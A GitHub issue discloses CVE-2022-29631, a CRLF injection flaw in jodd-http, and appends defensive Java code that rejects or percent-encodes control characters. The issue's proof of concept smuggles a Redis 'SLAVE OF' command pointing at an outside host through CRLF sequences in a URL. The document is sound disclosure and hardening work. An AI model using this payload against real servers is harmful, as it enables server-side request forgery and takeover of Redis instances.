CVE-2022-29631: CRLF injection vulnerability in jodd-http · Issue #9 · oblac/jodd-http
Jodd HTTP v6.0.9 was discovered to contain multiple CRLF injection vulnerabilities via the components jodd.http.HttpRequest#set and jodd.http.HttpRequest#send. These vulnerabilities allow attackers to execute Server-Side Request Forgery (SSRF) via a crafted TCP payload.
CRLF injection vulnerability in jodd-http
CRLF injection vulnerability in jodd.http.HttpRequest#set and jodd.http.HttpRequest#send in jodd-http versions 5.0.x, 5.1.x, 5.2.x, 6.0.x, 6.1.x, 6.2.x (all versions so far) allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL.
Proof of concept:
```xml
<dependency>
    <groupId>org.jodd</groupId>
    <artifactId>jodd-http</artifactId>
    <version>6.2.0</version>
</dependency>
```
```java
package top.inhann;

import jodd.http.HttpRequest;
import jodd.http.HttpResponse;

public class Test {
    public static void main(String[] args) {
        // The CRLF sequences inside the path are copied verbatim into the request buffer,
        // so everything after the first "\r\n" is sent to the server as additional request lines.
        String url = "http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nSLAVE OF inhann.top:6379\r\n\r\nPOST / ";
        HttpRequest req = HttpRequest.get(url);
        HttpResponse res = req.send();
    }
}
```
Run the PoC while listening on 127.0.0.1:6379.
Details:
In jodd.http.HttpRequest#set(), when processing the path, this.path(destination); is called, and it allows \r\n to be injected in the query string, path and fragment.
In jodd.http.HttpRequest#sendTo(), this.buffer(true); is called and tries to build the HTTP request payload. However, the path, query string, fragment and other components are just appended insecurely, which leads to the CRLF injection.
Suggestion:
It is recommended to URL-encode the invalid characters when constructing the HTTP request payload.
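An added hardening example, not part of this issue or of the jodd-http project, showing the two guards a caller or client library can apply before a URL reaches the request buffer: reject ASCII control characters outright, or percent-encode everything outside the RFC 3986 allowed set so a CR/LF can never terminate the request line. The class and method names (`SafeUrl`, `requireNoControlChars`, `percentEncodeUnsafe`) and the sample URL are hypothetical/constructed.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.charset.StandardCharsets;

/** Hypothetical guard applied before a URL string is handed to an HTTP client. */
public final class SafeUrl {

    // Characters RFC 3986 permits unencoded in path/query/fragment plus the URL delimiters.
    // '%' is deliberately absent: input is treated as raw, so a stray '%' is encoded too.
    private static final String ALLOWED =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~!$&'()*+,;=:@/?#";

    /** Strict mode: refuse any URL containing CR, LF or another ASCII control character. */
    public static String requireNoControlChars(String url) {
        for (int i = 0; i < url.length(); i++) {
            char c = url.charAt(i);
            if (c < 0x20 || c == 0x7f) {
                throw new IllegalArgumentException(
                    "control character U+" + String.format("%04X", (int) c) + " at index " + i);
            }
        }
        return url;
    }

    /** Lenient mode: percent-encode every byte outside ALLOWED (CR -> %0D, LF -> %0A, space -> %20). */
    public static String percentEncodeUnsafe(String url) {
        StringBuilder out = new StringBuilder(url.length());
        for (byte b : url.getBytes(StandardCharsets.UTF_8)) {
            char c = (char) (b & 0xff);
            if (ALLOWED.indexOf(c) >= 0) {
                out.append(c);
            } else {
                out.append('%').append(String.format("%02X", b & 0xff));
            }
        }
        return out.toString();
    }

    public static void main(String[] args) throws URISyntaxException {
        // Constructed sample with the same shape as the issue's PoC: CRLF sequences inside the path.
        String hostile = "http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nX";
        String encoded = percentEncodeUnsafe(hostile);
        System.out.println(encoded);   // single request line; no raw CR/LF left to split it
        new URI(encoded);              // now parses as one well-formed URI
        try {
            requireNoControlChars(hostile);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

In strict mode the request is never built at all, which is the safer default for URLs assembled from untrusted input; lenient mode keeps the request valid but the encoded junk still reaches the server as part of the path.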